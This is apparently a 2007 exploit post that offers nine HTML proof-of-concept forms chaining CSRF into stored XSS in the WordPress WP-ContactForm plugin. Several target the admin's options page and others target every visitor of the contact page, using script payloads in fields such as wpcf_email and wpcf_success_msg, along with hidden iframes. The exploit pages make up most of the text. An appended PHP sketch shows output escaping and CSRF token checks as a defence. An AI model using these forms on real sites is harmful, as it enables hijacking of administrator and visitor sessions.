For attacking admin only (at options page):
1
HTML code:
<html>
<head>
<title>MoBiC-29 Bonus: XSS in WP-ContactForm exploit (C) 2007 MustLive. http://websecurity.com.ua</title>
</head>
<!-- <body onLoad="document.hack.submit()"> -->
<body>
<form name="hack" action="http://site/wp-admin/admin.php?page=wp-contact-form/options-contactform.php" method="post">
<input type="hidden" name="stage" value="process" />
<input type="hidden" name="wpcf_email" value='"><script>alert(document.cookie)</script>' />
</form>
</body>
</html>
2
HTML code:
<html>
<head>
<title>MoBiC-29 Bonus: XSS in WP-ContactForm exploit (C) 2007 MustLive. http://websecurity.com.ua</title>
</head>
<!-- <body onLoad="document.hack.submit()"> -->
<body>
<form name="hack" action="http://site/wp-admin/admin.php?page=wp-contact-form/options-contactform.php" method="post">
<input type="hidden" name="stage" value="process" />
<input type="hidden" name="wpcf_subject" value='"><script>alert(document.cookie)</script>' />
</form>
</body>
</html>
3
HTML code:
<html>
<head>
<title>MoBiC-29 Bonus: XSS in WP-ContactForm exploit (C) 2007 MustLive. http://websecurity.com.ua</title>
</head>
<!-- <body onLoad="document.hack.submit()"> -->
<body>
<form name="hack" action="http://site/wp-admin/admin.php?page=wp-contact-form/options-contactform.php" method="post">
<input type="hidden" name="stage" value="process" />
<input type="hidden" name="wpcf_question" value='"><script>alert(document.cookie)</script>' />
</form>
</body>
</html>
4
HTML code:
<html>
<head>
<title>MoBiC-29 Bonus: XSS in WP-ContactForm exploit (C) 2007 MustLive. http://websecurity.com.ua</title>
</head>
<!-- <body onLoad="document.hack.submit()"> -->
<body>
<form name="hack" action="http://site/wp-admin/admin.php?page=wp-contact-form/options-contactform.php" method="post">
<input type="hidden" name="stage" value="process" />
<input type="hidden" name="wpcf_answer" value='"><script>alert(document.cookie)</script>' />
</form>
</body>
</html>
=====
For attacking every user of the site (at contact page):
5
HTML code:
<html>
<head>
<title>MoBiC-29 Bonus: XSS in WP-ContactForm exploit (C) 2007 MustLive. http://websecurity.com.ua</title>
</head>
<!-- <body onLoad="document.hack.submit()"> -->
<body>
<form name="hack" action="http://site/wp-admin/admin.php?page=wp-contact-form/options-contactform.php" method="post">
<input type="hidden" name="stage" value="process" />
<input type="hidden" name="wpcf_question" value="<script>alert(document.cookie)</script>" />
</form>
</body>
</html>
HTML code:
<html>
<head>
<title>MoBiC-29 Bonus: XSS in WP-ContactForm exploit (C) 2007 MustLive. http://websecurity.com.ua</title>
</head>
<body>
<iframe src="http://site/contact/" width="0" height="0"></iframe>
</body>
</html>
======
For attacking every user of the site at contact page (and admin at options page):
6
HTML code:
<html>
<head>
<title>MoBiC-29 Bonus: XSS in WP-ContactForm exploit (C) 2007 MustLive. http://websecurity.com.ua</title>
</head>
<!-- <body onLoad="document.hack.submit()"> -->
<body>
<form name="hack" action="http://site/wp-admin/admin.php?page=wp-contact-form/options-contactform.php" method="post">
<input type="hidden" name="stage" value="process" />
<input type="hidden" name="wpcf_success_msg" value="</textarea><script>alert(document.cookie)</script>" />
</form>
</body>
</html>
7
HTML code:
<html>
<head>
<title>MoBiC-29 Bonus: XSS in WP-ContactForm exploit (C) 2007 MustLive. http://websecurity.com.ua</title>
</head>
<!-- <body onLoad="document.hack.submit()"> -->
<body>
<form name="hack" action="http://site/wp-admin/admin.php?page=wp-contact-form/options-contactform.php" method="post">
<input type="hidden" name="stage" value="process" />
<input type="hidden" name="wpcf_error_msg" value="</textarea><script>alert(document.cookie)</script>" />
</form>
</body>
</html>
======
For attacking every user of the site (at contact page):
8
HTML code:
<html>
<head>
<title>MoBiC-29 Bonus: XSS in WP-ContactForm exploit (C) 2007 MustLive. http://websecurity.com.ua</title>
</head>
<!-- <body onLoad="document.hack.submit()"> -->
<body>
<form name="hack" action="http://site/wp-admin/admin.php?page=wp-contact-form/options-contactform.php" method="post">
<input type="hidden" name="stage" value="process" />
<input type="hidden" name="wpcf_answer" value="4" />
<input type="hidden" name="wpcf_success_msg" value="<script>alert(document.cookie)</script>" />
</form>
</body>
</html>
HTML code:
<html>
<head>
<title>MoBiC-29 Bonus: XSS in WP-ContactForm exploit (C) 2007 MustLive. http://websecurity.com.ua</title>
</head>
<!-- <body onLoad="document.hack.submit()"> -->
<body>
<form name="hack" action="http://site/contact/" method="post">
<input type="hidden" name="wpcf_stage" value="process" />
<input type="hidden" name="wpcf_your_name" value="test" />
<input type="hidden" name="wpcf_email" value="test@test.test" />
<input type="hidden" name="wpcf_response" value="4" />
<input type="hidden" name="wpcf_msg" value="XSS" />
</form>
</body>
</html>
9
HTML code:
<html>
<head>
<title>MoBiC-29 Bonus: XSS in WP-ContactForm exploit (C) 2007 MustLive. http://websecurity.com.ua</title>
</head>
<!-- <body onLoad="document.hack.submit()"> -->
<body>
<form name="hack" action="http://site/wp-admin/admin.php?page=wp-contact-form/options-contactform.php" method="post">
<input type="hidden" name="stage" value="process" />
<input type="hidden" name="wpcf_error_msg" value="<script>alert(document.cookie)</script>" />
</form>
</body>
</html>
HTML code:
<html>
<head>
<title>MoBiC-29 Bonus: XSS in WP-ContactForm exploit (C) 2007 MustLive. http://websecurity.com.ua</title>
</head>
<!-- <body onLoad="document.hack.submit()"> -->
<body>
<form name="hack" action="http://site/contact/" method="post">
<input type="hidden" name="wpcf_stage" value="process" />
<input type="hidden" name="wpcf_msg" value="XSS" />
</form>
</body>
</html>
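
A defensive counterpart to the forms above, as an added example that is not part of the original post and not the plugin's own code: it encodes the stored option values in each of the three places the forms target (input `value` attribute, `<textarea>` body, contact-page text) and rejects an options POST that lacks a session-bound token. The helper names `h()`, `render_options_form()`, `render_contact_message()`, `csrf_token_ok()` and the `csrf_token` field are assumptions; the `wpcf_*` field names are the ones on this page.

```php
<?php
// Added hardening sketch (hypothetical helpers, plain PHP, runs without WordPress).

// Encode a stored value so it is inert as an attribute value, textarea body or element text.
function h(string $value): string {
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Options page: the four text inputs and two textareas that the forms above write to.
function render_options_form(array $opts, string $token): string {
    $html = '<form method="post">';
    $html .= '<input type="hidden" name="csrf_token" value="' . h($token) . '" />';
    foreach (['wpcf_email', 'wpcf_subject', 'wpcf_question', 'wpcf_answer'] as $name) {
        $html .= '<input type="text" name="' . $name . '" value="' . h($opts[$name] ?? '') . '" />';
    }
    foreach (['wpcf_success_msg', 'wpcf_error_msg'] as $name) {
        $html .= '<textarea name="' . $name . '">' . h($opts[$name] ?? '') . '</textarea>';
    }
    return $html . '</form>';
}

// Contact page: question / success / error text that every visitor sees.
function render_contact_message(string $stored): string {
    return '<div class="contactform-msg">' . h($stored) . '</div>';
}

// A cross-site form cannot know the token bound to the admin's session.
function csrf_token_ok(array $post, string $sessionToken): bool {
    return isset($post['csrf_token']) && is_string($post['csrf_token'])
        && hash_equals($sessionToken, $post['csrf_token']);
}

// Constructed sample input: values taken from the forms on this page.
$stored = [
    'wpcf_email'       => '"><script>alert(document.cookie)</script>',
    'wpcf_success_msg' => '</textarea><script>alert(document.cookie)</script>',
    'wpcf_question'    => '<script>alert(document.cookie)</script>',
];
$token = bin2hex(random_bytes(16));

// Each check reports whether the rendered markup is free of a live <script> tag.
$form = render_options_form($stored, $token);
var_dump(strpos($form, '<script>') === false);
var_dump(strpos(render_contact_message($stored['wpcf_question']), '<script>') === false);

// A POST shaped like the forms above carries no token; the admin's own form does.
var_dump(csrf_token_ok(['stage' => 'process'], $token));
var_dump(csrf_token_ok(['stage' => 'process', 'csrf_token' => $token], $token));
```

Inside WordPress the same roles are filled by `esc_attr()`, `esc_textarea()` / `esc_html()`, and `wp_nonce_field()` with `check_admin_referer()`.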